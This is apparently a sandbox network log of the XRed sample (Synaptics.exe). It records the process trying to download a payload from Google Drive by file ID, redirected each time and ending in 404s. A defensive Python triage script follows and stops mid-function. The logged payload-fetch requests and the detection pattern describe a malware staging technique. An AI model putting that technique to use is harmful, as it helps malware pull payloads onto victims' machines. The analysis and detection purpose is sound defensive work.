    Cookie: NID=520=Qd4VV-n1Yf_ROsUrgdKPuhVdJtms881kuw5-NEclGzUMI-pzv_r7t2oeNy-J9FSKFzrC8RsZb1jmpZAtwdutAPAfwkkSqRjkQFouA9iiTjkzbMvRRD3RPGPIjJYkuZSKDMDHOQm86-lM5ResjXUPxi-6QIAowC9RRf915vNdpP-y3I2vWdY5l_w8
2024-12-30 10:25:36 UTC  1314               IN         HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 10:25:35 GMT
    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Strict-Transport-Security: max-age=31536000
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Content-Security-Policy: script-src 'report-sample' 'nonce-X2S7jn88OiK6csqlGxHSEw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Cross-Origin-Opener-Policy: same-origin
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
47          192.168.2.8  49791        216.58.206.46   443               6892  C:\ProgramData\Synaptics\Synaptics.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-30 10:25:35 UTC  345                OUT        GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Host: docs.google.com
    Cache-Control: no-cache
    Cookie: NID=520=Qd4VV-n1Yf_ROsUrgdKPuhVdJtms881kuw5-NEclGzUMI-pzv_r7t2oeNy-J9FSKFzrC8RsZb1jmpZAtwdutAPAfwkkSqRjkQFouA9iiTjkzbMvRRD3RPGPIjJYkuZSKDMDHOQm86-lM5ResjXUPxi-6QIAowC9RRf915vNdpP-y3I2vWdY5l_w8
2024-12-30 10:25:36 UTC  1314               IN         HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 10:25:35 GMT
    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Strict-Transport-Security: max-age=31536000
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'report-sample' 'nonce-DDzIi7B6y6qEr3X2Y7wFnQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Cross-Origin-Opener-Policy: same-origin
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
48          192.168.2.8  49793        172.217.16.193  443               6892  C:\ProgramData\Synaptics\Synaptics.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-30 10:25:35 UTC  388                OUT        GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
    Cookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
2024-12-30 10:25:36 UTC  1243               IN         HTTP/1.1 404 Not Found
    X-GUploader-UploadID: AFiumC5R5opFDXBZDj_xFI2C1hgJm0xYjxTSUWTmPX91YVIMI1SvGlqsOUIwkNRlKSaTfwpl
    Content-Type: text/html; charset=utf-8
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 10:25:36 GMT
    Content-Security-Policy: script-src 'report-sample' 'nonce--PuK1O-OFBCAmzE0SAdyoA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Cross-Origin-Opener-Policy: same-origin
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Content-Length: 1652
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Content-Security-Policy: sandbox allow-scripts
    Connection: close
2024-12-30 10:25:36 UTC  147                IN         Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:25:36 UTC  1390               IN         Data Ascii: t Found)!!1</title><style nonce="V6hp6sqOR8C0IfZPYQ1Otw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:25:36 UTC  115                IN         Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
49          192.168.2.8  49795        172.217.16.193  443               6892  C:\ProgramData\Synaptics\Synaptics.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-30 10:25:36 UTC  388                OUT        GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
    Cookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
2024-12-30 10:25:36 UTC  1250               IN         HTTP/1.1 404 Not Found
    X-GUploader-UploadID: AFiumC7PVJPSoGwzHOoCGcY_qjYdov7cUW-0QHlkTqveU_wXLwtGVlxU4d2mFDjEIuqTQQZf55_Qok8
    Content-Type: text/html; charset=utf-8
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 10:25:36 GMT
    Cross-Origin-Opener-Policy: same-origin
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'report-sample' 'nonce-HMJpQcPy-1QNgBiJs3SXMw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Content-Length: 1652
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Content-Security-Policy: sandbox allow-scripts
    Connection: close
2024-12-30 10:25:36 UTC  140                IN         Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:25:36 UTC  1390               IN         Data Ascii: 404 (Not Found)!!1</title><style nonce="MfdDkp0hMQnFgdkvuPP8vw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:25:36 UTC  122                IN         Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.8 | 49798 | 172.217.16.193 | 443 | 6892 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:44 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Cache-Control: no-cache
Host: drive.usercontent.google.com
Connection: Keep-Alive
Cookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
2024-12-30 10:25:45 UTC | 1250 | IN | HTTP/1.1 404 Not Found
X-GUploader-UploadID: AFiumC6DCeZRSCZBnMYPE1edPq1X3m8kNQxG7eWlBGQZXQGfT4Q49PKyoWG_CNL4JZ4DP6KZ4ojl5H0
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 30 Dec 2024 10:25:45 GMT
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'report-sample' 'nonce-n6jQ911SFKGqysCdV7hlaQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Cross-Origin-Opener-Policy: same-origin
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Content-Length: 1652
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Content-Security-Policy: sandbox allow-scripts
Connection: close
2024-12-30 10:25:45 UTC | 140 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:25:45 UTC | 1390 | IN | Data Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4f 41 4d 53 61 49 51 31 77 79 38 6f 63 47 4f 65 5f 50 59 46 52 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
Data Ascii: 404 (Not Found)!!1</title><style nonce="OAMSaIQ1wy8ocGOe_PYFRA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:25:45 UTC | 122 | IN | Data Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.8 | 49801 | 172.217.16.193 | 443 | 6892 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:44 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Cache-Control: no-cache
Host: drive.usercontent.google.com
Connection: Keep-Alive
Cookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
2024-12-30 10:25:45 UTC | 1250 | IN | HTTP/1.1 404 Not Found
X-GUploader-UploadID: AFiumC5eDVm4gnhoXToAsRrwGR411mWAbquMNanYAnd2chTOwahN8CDwiDciH9BDNwduHXexKWVDz8g
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 30 Dec 2024 10:25:45 GMT
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'report-sample' 'nonce-YZAeA_VocUk2GA_Rk_TmsA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Cross-Origin-Opener-Policy: same-origin
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Content-Length: 1652
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Content-Security-Policy: sandbox allow-scripts
Connection: close
2024-12-30 10:25:45 UTC | 140 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:25:45 UTC | 1390 | IN | Data Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2d 58 6c 52 74 6b 71 58 74 58 56 49 51 77 66 79 56 6b 72 39 70 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
Data Ascii: 404 (Not Found)!!1</title><style nonce="-XlRtkqXtXVIQwfyVkr9pw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:25:45 UTC | 122 | IN | Data Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.8 | 49797 | 216.58.206.46 | 443 | 6892 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:44 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
Cookie: NID=520=Qd4VV-n1Yf_ROsUrgdKPuhVdJtms881kuw5-NEclGzUMI-pzv_r7t2oeNy-J9FSKFzrC8RsZb1jmpZAtwdutAPAfwkkSqRjkQFouA9iiTjkzbMvRRD3RPGPIjJYkuZSKDMDHOQm86-lM5ResjXUPxi-6QIAowC9RRf915vNdpP-y3I2vWdY5l_w8
2024-12-30 10:25:45 UTC | 1314 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 30 Dec 2024 10:25:45 GMT
Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Strict-Transport-Security: max-age=31536000
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Content-Security-Policy: script-src 'report-sample' 'nonce-8PU9F4DzCg9ScbZ-Id9hkA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Cross-Origin-Opener-Policy: same-origin
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.8 | 49796 | 216.58.206.46 | 443 | 6892 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:44 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
Cookie: NID=520=Qd4VV-n1Yf_ROsUrgdKPuhVdJtms881kuw5-NEclGzUMI-pzv_r7t2oeNy-J9FSKFzrC8RsZb1jmpZAtwdutAPAfwkkSqRjkQFouA9iiTjkzbMvRRD3RPGPIjJYkuZSKDMDHOQm86-lM5ResjXUPxi-6QIAowC9RRf915vNdpP-y3I2vWdY5l_w8
2024-12-30 10:25:45 UTC | 1314 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 30 Dec 2024 10:25:45 GMT
Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Strict-Transport-Security: max-age=31536000
Cross-Origin-Opener-Policy: same-origin
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Content-Security-Policy: script-src 'report-sample' 'nonce-bgxifBEU5A9bbkjV2ux7FA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
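Sessions 50 to 53 all belong to PID 6892 (C:\ProgramData\Synaptics\Synaptics.exe) and show one retrieval chain: the process asks docs.google.com for a Drive file by ID with export=download, sends its own image name as User-Agent, is redirected (303) to drive.usercontent.google.com, and gets a 404 there, so the staged payload was already gone when the sample ran. The Python below is an added example, not code from the Joe Sandbox report or from the XRed sample: it turns those observables into a small triage score over session records that were constructed from the traffic above (only the request line, the headers that matter and the response status/Location are kept). The benign Firefox session, the weighting of one point per observable and the threshold of 3 are this example's own assumptions.

```python
"""Triage HTTP sessions for the Drive payload-fetch pattern seen in sessions 50-53.

Added example; not part of the sandbox report or of the analysed sample.
"""
import re
from urllib.parse import parse_qs, urlparse

# Constructed from sessions 52 and 50 of the report, trimmed to the relevant
# headers; session 99 is a fictitious browser download used as a benign control.
SAMPLE_SESSIONS = [
    {
        "session": 52, "pid": 6892,
        "process": "C:\\ProgramData\\Synaptics\\Synaptics.exe",
        "request": ("GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1\r\n"
                    "User-Agent: Synaptics.exe\r\nHost: docs.google.com\r\n"
                    "Cache-Control: no-cache\r\n\r\n"),
        "response": ("HTTP/1.1 303 See Other\r\nContent-Type: application/binary\r\n"
                     "Location: https://drive.usercontent.google.com/download"
                     "?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download\r\n\r\n"),
    },
    {
        "session": 50, "pid": 6892,
        "process": "C:\\ProgramData\\Synaptics\\Synaptics.exe",
        "request": ("GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1\r\n"
                    "User-Agent: Synaptics.exe\r\nCache-Control: no-cache\r\n"
                    "Host: drive.usercontent.google.com\r\nConnection: Keep-Alive\r\n\r\n"),
        "response": "HTTP/1.1 404 Not Found\r\nContent-Type: text/html; charset=utf-8\r\n\r\n",
    },
    {
        "session": 99, "pid": 4120,  # benign control, fictitious
        "process": "C:\\Program Files\\Mozilla Firefox\\firefox.exe",
        "request": ("GET /uc?id=1abcDEF&export=download HTTP/1.1\r\n"
                    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/133.0\r\n"
                    "Host: docs.google.com\r\n\r\n"),
        "response": "HTTP/1.1 200 OK\r\nContent-Type: application/octet-stream\r\n\r\n",
    },
]

# Hosts that serve Drive file content by ID; docs.google.com/uc redirects to
# drive.usercontent.google.com/download, exactly as sessions 52 and 53 show.
DRIVE_HOSTS = {"docs.google.com", "drive.google.com", "drive.usercontent.google.com"}
EXE_UA = re.compile(r"[\w.-]+\.exe", re.IGNORECASE)   # a bare image name used as UA


def parse_http(message):
    """Return (start line, {lower-cased header: value}) for one raw HTTP/1.1 message."""
    head = message.split("\r\n\r\n", 1)[0]
    start, *rest = head.split("\r\n")
    headers = {}
    for line in rest:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return start, headers


def triage(session):
    """Score one request/response pair; every reason is an observable from the report."""
    req_line, req = parse_http(session["request"])
    resp_line, resp = parse_http(session["response"])
    target = req_line.split(" ")[1]
    query = parse_qs(urlparse(target).query)
    ua = req.get("user-agent", "")
    image = session["process"].rsplit("\\", 1)[-1]
    reasons = []
    if EXE_UA.fullmatch(ua):
        reasons.append("User-Agent is a bare .exe name")
    if ua.lower() == image.lower():
        reasons.append("User-Agent equals the requesting process image")
    if req.get("host", "") in DRIVE_HOSTS and query.get("export") == ["download"]:
        reasons.append("Google Drive direct download by file ID")
    if session["process"].lower().startswith("c:\\programdata\\"):
        reasons.append("image runs from ProgramData")   # staging directory in this report
    location = resp.get("location")
    return {
        "session": session["session"],
        "pid": session["pid"],
        "score": len(reasons),
        "reasons": reasons,
        "file_id": (query.get("id") or [None])[0],
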